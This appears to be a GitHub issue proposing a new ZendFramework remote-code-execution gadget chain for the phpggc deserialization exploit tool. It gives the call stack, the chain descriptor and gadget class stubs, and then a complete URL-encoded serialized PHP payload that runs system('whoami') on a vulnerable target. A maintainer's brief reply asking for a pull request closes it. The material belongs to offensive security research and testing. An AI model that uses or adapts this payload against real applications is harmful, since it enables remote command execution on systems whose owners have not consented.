Recently I have been studying the zendframework/rce3 chain and found a new chain, which I hope can be added to phpggc.
The call stack is: `Zend\Cache\Storage\Adapter\Memory::__destruct` → `Zend\View\Renderer\PhpRenderer::__call` → `Zend\ServiceManager\AbstractPluginManager::get` → `Zend\ServiceManager\ServiceManager::get` → `Zend\ServiceManager\ServiceManager::create` → `Zend\Filter\AbstractFilter::__invoke` → `Zend\Filter\FilterChain::filter`.
chain.php:
<?php

namespace GadgetChain\ZendFramework;

/**
 * phpggc descriptor for the ZendFramework RCE3 gadget chain.
 *
 * The chain starts in Zend\Cache\Storage\Adapter\Memory::__destruct and, per the
 * call stack given in the issue, ends in Zend\Filter\FilterChain::filter, where
 * the supplied function name is called with the supplied argument (hence the
 * FunctionCall chain type). The gadget stubs themselves live in gadgets.php.
 *
 * As with every phpggc chain, the generated object only does anything when a
 * target passes attacker-controlled data to unserialize() with these Zend
 * classes autoloadable.
 */
class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    // Lower bound reported by the author; the upper bound has not been established.
    public static $version = '2.0.1 <= ?';
    public static $vector = '__destruct';
    public static $author = 'CyanM0un';

    /**
     * Build the root gadget for one function call.
     *
     * @param array $parameters 'function'  => name of the function to call (e.g. 'system'),
     *                          'parameter' => its single string argument
     * @return \Zend\Cache\Storage\Adapter\Memory the object to serialize
     */
    public function generate(array $parameters)
    {
        ['function' => $callee, 'parameter' => $argument] = $parameters;

        return new \Zend\Cache\Storage\Adapter\Memory($callee, $argument);
    }
}
gadgets.php
<?php

/*
 * Minimal stand-ins for the Zend classes used by the RCE3 chain. Only the
 * properties read along the path
 *   Memory::__destruct -> PhpRenderer::__call -> AbstractPluginManager::get
 *   -> ServiceManager::get -> ServiceManager::create
 *   -> AbstractFilter::__invoke -> FilterChain::filter
 * are declared, with the same visibility as the real classes so that the
 * mangled property names in the serialized form ("\0*\0prop" for protected,
 * "\0Class\0prop" for private) are what unserialize() expects on the target.
 * Nothing here runs at generation time; the behaviour lives in the target's
 * own Zend code.
 */

namespace Zend\Cache\Storage\Adapter {
    /**
     * Chain entry point. Per the issue's call stack the real __destruct walks
     * $eventHandles and calls into the object held in $events; that object is
     * a PhpRenderer here, so the call lands in PhpRenderer::__call.
     */
    class Memory
    {
        protected $eventHandles;
        protected $events;

        public function __construct($function, $param)
        {
            // A single handle is enough for the destructor's loop to run once.
            $this->eventHandles = [1];
            $this->events = new \Zend\View\Renderer\PhpRenderer($function, $param);
        }
    }
}

namespace Zend\View\Renderer {
    /**
     * __call target. The plugin manager in the private $__helpers property is
     * what PhpRenderer::__call forwards the unknown method name to
     * (AbstractPluginManager::get in the call stack).
     */
    class PhpRenderer
    {
        private $__helpers;

        public function __construct($function, $param)
        {
            $this->__helpers = new \Zend\Tag\Cloud\DecoratorPluginManager($function, $param);
        }
    }
}

namespace Zend\Tag\Cloud {
    /**
     * Concrete plugin manager (AbstractPluginManager is abstract). The name
     * reaching get() is canonicalized through $canonicalNames, resolved to a
     * class via $invokableClasses, and the freshly created instance is then
     * handed to every entry of $initializers -- which is where the FilterChain
     * is invoked.
     */
    class DecoratorPluginManager
    {
        protected $canonicalNames;
        protected $invokableClasses;
        protected $retrieveFromPeeringManagerFirst;
        protected $initializers;

        public function __construct($function, $param)
        {
            // "detach" is presumably the method name that arrives via __call;
            // both mappings are present in the author's working payload.
            $this->canonicalNames = ['detach' => 'cname', 'cname' => 'any'];
            // Any loadable class will do: it only has to satisfy class_exists().
            $this->invokableClasses = ['cname' => __CLASS__];
            $this->retrieveFromPeeringManagerFirst = false;
            $this->initializers = [new \Zend\Filter\FilterChain($function, $param)];
        }
    }
}

namespace Zend\Filter {
    /**
     * Final gadget. FilterChain::filter applies the entries of $filters in
     * turn to the running value (behaviour of the real class, not shown here):
     *   0: [Expr, '__toString'] -> yields the argument string held by Expr
     *   1: $function            -> e.g. 'system', called with that string
     * SplFixedArray gives a fixed, index-ordered iteration, which the chain
     * relies on.
     */
    class FilterChain
    {
        protected $filters;

        public function __construct($function, $param)
        {
            $this->filters = \SplFixedArray::fromArray([
                [new \Zend\Json\Expr($param), '__toString'],
                $function,
            ]);
        }
    }
}

namespace Zend\Json {
    /**
     * Holder for the function argument. The real Expr::__toString presumably
     * returns $expression as-is, so invoking it as the first filter turns this
     * object into the plain string passed to $function -- TODO confirm.
     */
    class Expr
    {
        protected $expression;

        public function __construct($param)
        {
            $this->expression = $param;
        }
    }
}
It can be tested with the following URL-encoded payload, which runs `system('whoami')` on the target:
O%3A33%3A%22Zend%5CCache%5CStorage%5CAdapter%5CMemory%22%3A2%3A%7Bs%3A15%3A%22%00%2A%00eventHandles%22%3Ba%3A1%3A%7Bi%3A0%3Bi%3A1%3B%7Ds%3A9%3A%22%00%2A%00events%22%3BO%3A30%3A%22Zend%5CView%5CRenderer%5CPhpRenderer%22%3A1%3A%7Bs%3A41%3A%22%00Zend%5CView%5CRenderer%5CPhpRenderer%00__helpers%22%3BO%3A37%3A%22Zend%5CTag%5CCloud%5CDecoratorPluginManager%22%3A4%3A%7Bs%3A17%3A%22%00%2A%00canonicalNames%22%3Ba%3A2%3A%7Bs%3A6%3A%22detach%22%3Bs%3A5%3A%22cname%22%3Bs%3A5%3A%22cname%22%3Bs%3A3%3A%22any%22%3B%7Ds%3A19%3A%22%00%2A%00invokableClasses%22%3Ba%3A1%3A%7Bs%3A5%3A%22cname%22%3Bs%3A37%3A%22Zend%5CTag%5CCloud%5CDecoratorPluginManager%22%3B%7Ds%3A34%3A%22%00%2A%00retrieveFromPeeringManagerFirst%22%3Bb%3A0%3Bs%3A15%3A%22%00%2A%00initializers%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A23%3A%22Zend%5CFilter%5CFilterChain%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00filters%22%3BO%3A13%3A%22SplFixedArray%22%3A2%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A14%3A%22Zend%5CJson%5CExpr%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00expression%22%3Bs%3A6%3A%22whoami%22%3B%7Di%3A1%3Bs%3A10%3A%22__toString%22%3B%7Di%3A1%3Bs%3A6%3A%22system%22%3B%7D%7D%7D%7D%7D%7D
Hello again,
Same as before: can you please open a PR?
Charles